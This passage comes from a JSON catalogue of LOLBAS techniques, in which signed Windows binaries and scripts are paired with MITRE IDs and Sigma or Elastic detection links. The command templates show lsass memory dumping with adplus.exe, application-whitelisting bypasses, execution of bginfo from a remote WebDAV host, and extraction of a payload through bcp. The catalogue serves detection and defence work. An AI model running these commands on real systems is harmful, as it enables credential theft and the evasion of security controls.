execution","mitre":["T1216"],"privilege":"admin","fullPath":["C:\\Windows\\System32\\winrm.vbs","C:\\Windows\\SysWOW64\\winrm.vbs"],"toolType":"Script","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_winrm_awl_bypass.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_winrm_execution_via_scripting_api_winrm_vbs.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/file/file_event/file_event_win_winrm_awl_bypass.yml"},{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"}],"references":["https://www.slideshare.net/enigma0x3/windows-operating-system-archaeology","https://www.youtube.com/watch?v=3gz1QmiMhss","https://github.com/enigma0x3/windows-operating-system-archaeology","https://redcanary.com/blog/lateral-movement-winrm-wmi/","https://twitter.com/bohops/status/994405551751815170","https://posts.specterops.io/application-whitelisting-bypass-and-arbitrary-unsigned-code-execution-technique-in-winrm-vbs-c8c24fb40404","https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-management-instrumentation.pdf","https://lolbas-project.github.io/lolbas/Scripts/winrm/"]},{"id":"lolbas:winrm-vbs:2","toolId":"lolbas:winrm-vbs","toolName":"winrm.vbs","name":"AWL Bypass","source":"LOLBAS","platform":["Windows"],"capability":["AWL / Policy Bypass"],"nativeCategory":["AWL Bypass"],"command":"%SystemDrive%\\BypassDir\\cscript //nologo %windir%\\System32\\winrm.vbs get wmicimv2/Win32_Process?Handle=4 -format:pretty","description":"Bypass AWL solutions by copying cscript.exe to an attacker-controlled location; creating a malicious WsmPty.xsl in the same location, and executing winrm.vbs via the relocated cscript.exe.","usecase":"Execute arbitrary, unsigned code via XSL script","mitre":["T1220"],"privilege":"user","fullPath":["C:\\Windows\\System32\\winrm.vbs","C:\\Windows\\SysWOW64\\winrm.vbs"],"toolType":"Script","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_winrm_awl_bypass.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_winrm_execution_via_scripting_api_winrm_vbs.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/file/file_event/file_event_win_winrm_awl_bypass.yml"},{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"}],"references":["https://www.slideshare.net/enigma0x3/windows-operating-system-archaeology","https://www.youtube.com/watch?v=3gz1QmiMhss","https://github.com/enigma0x3/windows-operating-system-archaeology","https://redcanary.com/blog/lateral-movement-winrm-wmi/","https://twitter.com/bohops/status/994405551751815170","https://posts.specterops.io/application-whitelisting-bypass-and-arbitrary-unsigned-code-execution-technique-in-winrm-vbs-c8c24fb40404","https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-management-instrumentation.pdf","https://lolbas-project.github.io/lolbas/Scripts/winrm/"]},{"id":"lolbas:pester-bat:0","toolId":"lolbas:pester-bat","toolName":"Pester.bat","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"Pester.bat [/help|?|-?|/?] \"$null; {CMD}\"","description":"Execute code using Pester. The third parameter can be anything. The fourth is the payload.","usecase":"Proxy execution","mitre":["T1216"],"privilege":"user","fullPath":["c:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\<VERSION>\\bin\\Pester.bat"],"toolType":"Script","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_pester_1.yml"}],"references":["https://twitter.com/Oddvarmoe/status/993383596244258816","https://twitter.com/_st0pp3r_/status/1560072680887525378","https://lolbas-project.github.io/lolbas/Scripts/Pester/"]},{"id":"lolbas:pester-bat:1","toolId":"lolbas:pester-bat","toolName":"Pester.bat","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"Pester.bat ;{PATH:.exe}","description":"Execute code using Pester. Example here executes specified executable.","usecase":"Proxy execution","mitre":["T1216"],"privilege":"user","fullPath":["c:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\<VERSION>\\bin\\Pester.bat"],"toolType":"Script","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_pester_1.yml"}],"references":["https://twitter.com/Oddvarmoe/status/993383596244258816","https://twitter.com/_st0pp3r_/status/1560072680887525378","https://lolbas-project.github.io/lolbas/Scripts/Pester/"]},{"id":"lolbas:acccheckconsole-exe:0","toolId":"lolbas:acccheckconsole-exe","toolName":"AccCheckConsole.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"AccCheckConsole.exe -window \"Untitled - Notepad\" {PATH_ABSOLUTE:.dll}","description":"Load a managed DLL in the context of AccCheckConsole.exe. The -window switch value can be set to an arbitrary active window name.","usecase":"Local execution of managed code from assembly DLL.","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Program Files (x86)\\Windows Kits\\10\\bin\\10.0.22000.0\\x86\\AccChecker\\AccCheckConsole.exe","C:\\Program Files (x86)\\Windows Kits\\10\\bin\\10.0.22000.0\\x64\\AccChecker\\AccCheckConsole.exe","C:\\Program Files (x86)\\Windows Kits\\10\\bin\\10.0.22000.0\\arm\\AccChecker\\AccCheckConsole.exe","C:\\Program Files (x86)\\Windows Kits\\10\\bin\\10.0.22000.0\\arm64\\AccChecker\\AccCheckConsole.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/19396788dbedc57249a46efed2bb1927abc376d4/rules/windows/process_creation/proc_creation_win_lolbin_susp_acccheckconsole.yml"},{"type":"IOC","value":"Sysmon Event ID 1 - Process Creation"},{"type":"Analysis","value":"https://gist.github.com/bohops/2444129419c8acf837aedda5f0e7f340"}],"references":["https://gist.github.com/bohops/2444129419c8acf837aedda5f0e7f340","https://twitter.com/bohops/status/1477717351017680899","https://lolbas-project.github.io/lolbas/OtherMSBinaries/AccCheckConsole/"]},{"id":"lolbas:acccheckconsole-exe:1","toolId":"lolbas:acccheckconsole-exe","toolName":"AccCheckConsole.exe","name":"AWL Bypass","source":"LOLBAS","platform":["Windows"],"capability":["AWL / Policy Bypass"],"nativeCategory":["AWL Bypass"],"command":"AccCheckConsole.exe -window \"Untitled - Notepad\" {PATH_ABSOLUTE:.dll}","description":"Load a managed DLL in the context of AccCheckConsole.exe. The -window switch value can be set to an arbitrary active window name.","usecase":"Local execution of managed code to bypass AppLocker.","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Program Files (x86)\\Windows Kits\\10\\bin\\10.0.22000.0\\x86\\AccChecker\\AccCheckConsole.exe","C:\\Program Files (x86)\\Windows Kits\\10\\bin\\10.0.22000.0\\x64\\AccChecker\\AccCheckConsole.exe","C:\\Program Files (x86)\\Windows Kits\\10\\bin\\10.0.22000.0\\arm\\AccChecker\\AccCheckConsole.exe","C:\\Program Files (x86)\\Windows Kits\\10\\bin\\10.0.22000.0\\arm64\\AccChecker\\AccCheckConsole.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/19396788dbedc57249a46efed2bb1927abc376d4/rules/windows/process_creation/proc_creation_win_lolbin_susp_acccheckconsole.yml"},{"type":"IOC","value":"Sysmon Event ID 1 - Process Creation"},{"type":"Analysis","value":"https://gist.github.com/bohops/2444129419c8acf837aedda5f0e7f340"}],"references":["https://gist.github.com/bohops/2444129419c8acf837aedda5f0e7f340","https://twitter.com/bohops/status/1477717351017680899","https://lolbas-project.github.io/lolbas/OtherMSBinaries/AccCheckConsole/"]},{"id":"lolbas:adplus-exe:0","toolId":"lolbas:adplus-exe","toolName":"adplus.exe","name":"Dump","source":"LOLBAS","platform":["Windows"],"capability":["Credential Access"],"nativeCategory":["Dump"],"command":"adplus.exe -hang -pn lsass.exe -o {PATH_ABSOLUTE:folder} -quiet","description":"Creates a memory dump of the lsass process","usecase":"Create memory dump and parse it offline","mitre":["T1003.001"],"privilege":"system","fullPath":["C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\x64\\adplus.exe","C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\x86\\adplus.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6199a703221a98ae6ad343c79c558da375203e4e/rules/windows/process_creation/proc_creation_win_lolbin_adplus.yml"},{"type":"IOC","value":"As a Windows SDK binary, execution on a system may be suspicious"}],"references":["https://mrd0x.com/adplus-debugging-tool-lsass-dump/","https://twitter.com/nas_bench/status/1534916659676422152","https://twitter.com/nas_bench/status/1534915321856917506","https://lolbas-project.github.io/lolbas/OtherMSBinaries/adplus/"]},{"id":"lolbas:adplus-exe:1","toolId":"lolbas:adplus-exe","toolName":"adplus.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"adplus.exe -c {PATH:.xml}","description":"Execute arbitrary commands using adplus config file (see Resources section for a sample file).","usecase":"Run commands under a trusted Microsoft signed binary","mitre":["T1127"],"privilege":"user","fullPath":["C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\x64\\adplus.exe","C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\x86\\adplus.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6199a703221a98ae6ad343c79c558da375203e4e/rules/windows/process_creation/proc_creation_win_lolbin_adplus.yml"},{"type":"IOC","value":"As a Windows SDK binary, execution on a system may be suspicious"}],"references":["https://mrd0x.com/adplus-debugging-tool-lsass-dump/","https://twitter.com/nas_bench/status/1534916659676422152","https://twitter.com/nas_bench/status/1534915321856917506","https://lolbas-project.github.io/lolbas/OtherMSBinaries/adplus/"]},{"id":"lolbas:adplus-exe:2","toolId":"lolbas:adplus-exe","toolName":"adplus.exe","name":"Dump","source":"LOLBAS","platform":["Windows"],"capability":["Credential Access"],"nativeCategory":["Dump"],"command":"adplus.exe -c {PATH:.xml}","description":"Dump process memory using adplus config file (see Resources section for a sample file).","usecase":"Run commands under a trusted Microsoft signed binary","mitre":["T1003.001"],"privilege":"system","fullPath":["C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\x64\\adplus.exe","C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\x86\\adplus.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6199a703221a98ae6ad343c79c558da375203e4e/rules/windows/process_creation/proc_creation_win_lolbin_adplus.yml"},{"type":"IOC","value":"As a Windows SDK binary, execution on a system may be suspicious"}],"references":["https://mrd0x.com/adplus-debugging-tool-lsass-dump/","https://twitter.com/nas_bench/status/1534916659676422152","https://twitter.com/nas_bench/status/1534915321856917506","https://lolbas-project.github.io/lolbas/OtherMSBinaries/adplus/"]},{"id":"lolbas:adplus-exe:3","toolId":"lolbas:adplus-exe","toolName":"adplus.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"adplus.exe -crash -o \"{PATH_ABSOLUTE:folder}\" -sc {PATH:.exe}","description":"Execute arbitrary commands and binaries from the context of adplus. Note that providing an output directory via '-o' is required.","usecase":"Run commands under a trusted Microsoft signed binary","mitre":["T1127"],"privilege":"user","fullPath":["C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\x64\\adplus.exe","C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\x86\\adplus.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6199a703221a98ae6ad343c79c558da375203e4e/rules/windows/process_creation/proc_creation_win_lolbin_adplus.yml"},{"type":"IOC","value":"As a Windows SDK binary, execution on a system may be suspicious"}],"references":["https://mrd0x.com/adplus-debugging-tool-lsass-dump/","https://twitter.com/nas_bench/status/1534916659676422152","https://twitter.com/nas_bench/status/1534915321856917506","https://lolbas-project.github.io/lolbas/OtherMSBinaries/adplus/"]},{"id":"lolbas:agentexecutor-exe:0","toolId":"lolbas:agentexecutor-exe","toolName":"AgentExecutor.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"AgentExecutor.exe -powershell \"{PATH_ABSOLUTE:.ps1}\" \"{PATH_ABSOLUTE:.1.log}\" \"{PATH_ABSOLUTE:.2.log}\" \"{PATH_ABSOLUTE:.3.log}\" 60000 \"C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\" 0 1","description":"Spawns powershell.exe and executes a provided powershell script with ExecutionPolicy Bypass argument","usecase":"Execute unsigned powershell scripts","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Program Files (x86)\\Microsoft Intune Management Extension\\AgentExecutor.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/19396788dbedc57249a46efed2bb1927abc376d4/rules/windows/process_creation/proc_creation_win_lolbin_agentexecutor.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/19396788dbedc57249a46efed2bb1927abc376d4/rules/windows/process_creation/proc_creation_win_lolbin_agentexecutor_susp_usage.yml"}],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/AgentExecutor/"]},{"id":"lolbas:agentexecutor-exe:1","toolId":"lolbas:agentexecutor-exe","toolName":"AgentExecutor.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"AgentExecutor.exe -powershell \"{PATH_ABSOLUTE:.ps1}\" \"{PATH_ABSOLUTE:.1.log}\" \"{PATH_ABSOLUTE:.2.log}\" \"{PATH_ABSOLUTE:.3.log}\" 60000 \"{PATH_ABSOLUTE:folder}\" 0 1","description":"If we place a binary named powershell.exe in the specified folder path, agentexecutor.exe will execute it successfully","usecase":"Execute a provided EXE","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Program Files (x86)\\Microsoft Intune Management Extension\\AgentExecutor.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/19396788dbedc57249a46efed2bb1927abc376d4/rules/windows/process_creation/proc_creation_win_lolbin_agentexecutor.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/19396788dbedc57249a46efed2bb1927abc376d4/rules/windows/process_creation/proc_creation_win_lolbin_agentexecutor_susp_usage.yml"}],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/AgentExecutor/"]},{"id":"lolbas:applauncher-exe:0","toolId":"lolbas:applauncher-exe","toolName":"AppLauncher.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"AppLauncher.exe {PATH_ABSOLUTE:.exe}","description":"Launches an executable via User Experience Virtualization tool.","usecase":"Executes an executable under a trusted, Microsoft signed binary.","mitre":["T1127"],"privilege":"user","fullPath":["C:\\Program Files\\Windows Kits\\10\\Microsoft User Experience Virtualization\\Management\\AppLauncher.exe","C:\\Program Files (x86)\\Windows Kits\\10\\Microsoft User Experience Virtualization\\Management\\AppLauncher.exe"],"toolType":"OtherMSBinary","references":["https://learn.microsoft.com/en-us/microsoft-desktop-optimization-pack/ue-v/uev-getting-started","https://lolbas-project.github.io/lolbas/OtherMSBinaries/AppLauncher/"]},{"id":"lolbas:appcert-exe:0","toolId":"lolbas:appcert-exe","toolName":"AppCert.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"appcert.exe test -apptype desktop -setuppath {PATH_ABSOLUTE:.exe} -reportoutputpath {PATH_ABSOLUTE:.xml}","description":"Execute an executable file via the Windows App Certification Kit command-line tool.","usecase":"Performs execution of specified file, can be used as a defense evasion","mitre":["T1127"],"privilege":"admin","fullPath":["C:\\Program Files (x86)\\Windows Kits\\10\\App Certification Kit\\appcert.exe","C:\\Program Files\\Windows Kits\\10\\App Certification Kit\\appcert.exe"],"toolType":"OtherMSBinary","references":["https://learn.microsoft.com/windows/win32/win_cert/using-the-windows-app-certification-kit","https://lolbas-project.github.io/lolbas/OtherMSBinaries/AppCert/"]},{"id":"lolbas:appcert-exe:1","toolId":"lolbas:appcert-exe","toolName":"AppCert.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"appcert.exe test -apptype desktop -setuppath {PATH_ABSOLUTE:.msi} -setupcommandline /q -reportoutputpath {PATH_ABSOLUTE:.xml}","description":"Install an MSI file via an msiexec instance spawned via appcert.exe as parent process.","usecase":"Execute custom made MSI file with malicious code","mitre":["T1218.007"],"privilege":"admin","fullPath":["C:\\Program Files (x86)\\Windows Kits\\10\\App Certification Kit\\appcert.exe","C:\\Program Files\\Windows Kits\\10\\App Certification Kit\\appcert.exe"],"toolType":"OtherMSBinary","references":["https://learn.microsoft.com/windows/win32/win_cert/using-the-windows-app-certification-kit","https://lolbas-project.github.io/lolbas/OtherMSBinaries/AppCert/"]},{"id":"lolbas:appvlp-exe:0","toolId":"lolbas:appvlp-exe","toolName":"Appvlp.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"AppVLP.exe {PATH_SMB:.bat}","description":"Executes .bat file through AppVLP.exe","usecase":"Execution of BAT file hosted on Webdav server.","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Program Files\\Microsoft Office\\root\\client\\appvlp.exe","C:\\Program Files (x86)\\Microsoft Office\\root\\client\\appvlp.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_appvlp.yml"}],"references":["https://github.com/MoooKitty/Code-Execution","https://twitter.com/moo_hax/status/892388990686347264","https://enigma0x3.net/2018/06/11/the-tale-of-settingcontent-ms-files/","https://securityboulevard.com/2018/07/attackers-test-new-document-attack-vector-that-slips-past-office-defenses/","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Appvlp/"]},{"id":"lolbas:appvlp-exe:1","toolId":"lolbas:appvlp-exe","toolName":"Appvlp.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"AppVLP.exe powershell.exe -c \"$e=New-Object -ComObject shell.application;$e.ShellExecute('{PATH:.exe}','', '', 'open', 1)\"","description":"Executes powershell.exe as a subprocess of AppVLP.exe and run the respective PS command.","usecase":"Local execution of process bypassing Attack Surface Reduction (ASR).","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Program Files\\Microsoft Office\\root\\client\\appvlp.exe","C:\\Program Files (x86)\\Microsoft Office\\root\\client\\appvlp.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_appvlp.yml"}],"references":["https://github.com/MoooKitty/Code-Execution","https://twitter.com/moo_hax/status/892388990686347264","https://enigma0x3.net/2018/06/11/the-tale-of-settingcontent-ms-files/","https://securityboulevard.com/2018/07/attackers-test-new-document-attack-vector-that-slips-past-office-defenses/","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Appvlp/"]},{"id":"lolbas:bcp-exe:0","toolId":"lolbas:bcp-exe","toolName":"Bcp.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"bcp \"SELECT payload_data FROM database.dbo.payloads WHERE id=1\" queryout \"C:\\Windows\\Temp\\payload.exe\" -S localhost -T -c","description":"Export binary payload stored in SQL Server database to file system.","usecase":"Extract malicious executable from database storage to local file system for execution.","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Program Files\\Microsoft SQL Server\\Client SDK\\ODBC\\170\\Tools\\Binn\\bcp.exe","C:\\Program Files\\Microsoft SQL Server\\Client SDK\\ODBC\\130\\Tools\\Binn\\bcp.exe","C:\\Program Files\\Microsoft SQL Server\\Client SDK\\ODBC\\110\\Tools\\Binn\\bcp.exe","C:\\Program Files (x86)\\Microsoft SQL Server\\Client SDK\\ODBC\\170\\Tools\\Binn\\bcp.exe","C:\\Program Files (x86)\\Microsoft SQL Server\\Client SDK\\ODBC\\130\\Tools\\Binn\\bcp.exe","C:\\Program Files (x86)\\Microsoft SQL Server\\Client SDK\\ODBC\\110\\Tools\\Binn\\bcp.exe","C:\\Program Files (x86)\\Microsoft SQL Server\\120\\Tools\\Binn\\bcp.exe"],"toolType":"OtherMSBinary","detection":[{"type":"IOC","value":"Process creation of bcp.exe with queryout or Out parameter"},{"type":"IOC","value":"bcp.exe writing executable files to temp or users directories"},{"type":"IOC","value":"Network connections from bcp.exe to SQL Server followed by file creation"},{"type":"IOC","value":"Event ID 4688 - Process creation for bcp.exe"},{"type":"IOC","value":"Event ID 4663 - File system access by bcp.exe"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_bcp_export_data.yml"}],"references":["https://docs.microsoft.com/en-us/sql/tools/bcp-utility","https://asec.ahnlab.com/en/61000/","https://asec.ahnlab.com/en/78944/","https://www.huntress.com/blog/attacking-mssql-servers","https://www.huntress.com/blog/attacking-mssql-servers-pt-ii","https://news.sophos.com/en-us/2024/08/07/sophos-mdr-hunt-tracks-mimic-ransomware-campaign-against-organizations-in-india/","https://research.nccgroup.com/2018/03/10/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Bcp/"]},{"id":"lolbas:bginfo-exe:0","toolId":"lolbas:bginfo-exe","toolName":"Bginfo.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"bginfo.exe {PATH:.bgi} /popup /nolicprompt","description":"Execute VBscript code that is referenced within the specified .bgi file.","usecase":"Local execution of VBScript","mitre":["T1218"],"privilege":"user","fullPath":["no default"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_bginfo.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml"},{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"}],"references":["https://oddvar.moe/2017/05/18/bypassing-application-whitelisting-with-bginfo/","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Bginfo/"]},{"id":"lolbas:bginfo-exe:1","toolId":"lolbas:bginfo-exe","toolName":"Bginfo.exe","name":"AWL Bypass","source":"LOLBAS","platform":["Windows"],"capability":["AWL / Policy Bypass"],"nativeCategory":["AWL Bypass"],"command":"bginfo.exe {PATH:.bgi} /popup /nolicprompt","description":"Execute VBscript code that is referenced within the specified .bgi file.","usecase":"Local execution of VBScript","mitre":["T1218"],"privilege":"user","fullPath":["no default"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_bginfo.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml"},{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"}],"references":["https://oddvar.moe/2017/05/18/bypassing-application-whitelisting-with-bginfo/","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Bginfo/"]},{"id":"lolbas:bginfo-exe:2","toolId":"lolbas:bginfo-exe","toolName":"Bginfo.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"\\\\10.10.10.10\\webdav\\bginfo.exe {PATH:.bgi} /popup /nolicprompt","description":"Execute bginfo.exe from a WebDAV server.","usecase":"Remote execution of VBScript","mitre":["T1218"],"privilege":"user","fullPath":["no default"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_bginfo.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml"},{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"}],"references":["https://oddvar.moe/2017/05/18/bypassing-application-whitelisting-with-bginfo/","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Bginfo/"]},{"id":"lolbas:bginfo-exe:3","toolId":"lolbas:bginfo-exe","toolName":"Bginfo.exe","name":"AWL Bypass","source":"LOLBAS","platform":["Windows"],"capability":["AWL / Policy Bypass"],"nativeCategory":["AWL Bypass"],"command":"\\\\10.10.10.10\\webdav\\bginfo.exe {PATH:.bgi} /popup /nolicprompt","description":"Execute bginfo.exe from a WebDAV server.","usecase":"Remote execution of VBScript","mitre":["T1218"],"privilege":"user","fullPath":["no default"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_bginfo.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml"},{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"}],"references":["https://oddvar.moe/2017/05/18/bypassing-application-whitelisting-with-bginfo/","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Bginfo/"]},{"id":"lolbas:bginfo-exe:4","toolId":"lolbas:bginfo-exe","toolName":"Bginfo.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"\\\\live.sysinternals.com\\Tools\\bginfo.exe {PATH_SMB:.bgi} /popup /nolicprompt","description":"This style of execution may not longer work due to patch.","usecase":"Remote execution of VBScript","mitre":["T1218"],"privilege":"user","fullPath":["no default"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_bginfo.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml"},{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"}],"references":["https://oddvar.moe/2017/05/18/bypassing-application-whitelisting-with-bginfo/","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Bginfo/"]},{"id":"lolbas:bginfo-exe:5","toolId":"lolbas:bginfo-exe","toolName":"Bginfo.exe","name":"AWL Bypass","source":"LOLBAS","platform":["Windows"],"capability":["AWL / Policy Bypass"],"nativeCategory":["AWL Bypass"],"command":"\\\\live.sysinternals.com\\Tools\\bginfo.exe {PATH_SMB:.bgi} /popup /nolicprompt","description":"This style of execution may not longer work due to patch.","usecase":"Remote execution of VBScript","mitre":["T1218"],"privilege":"user","fullPath":["no 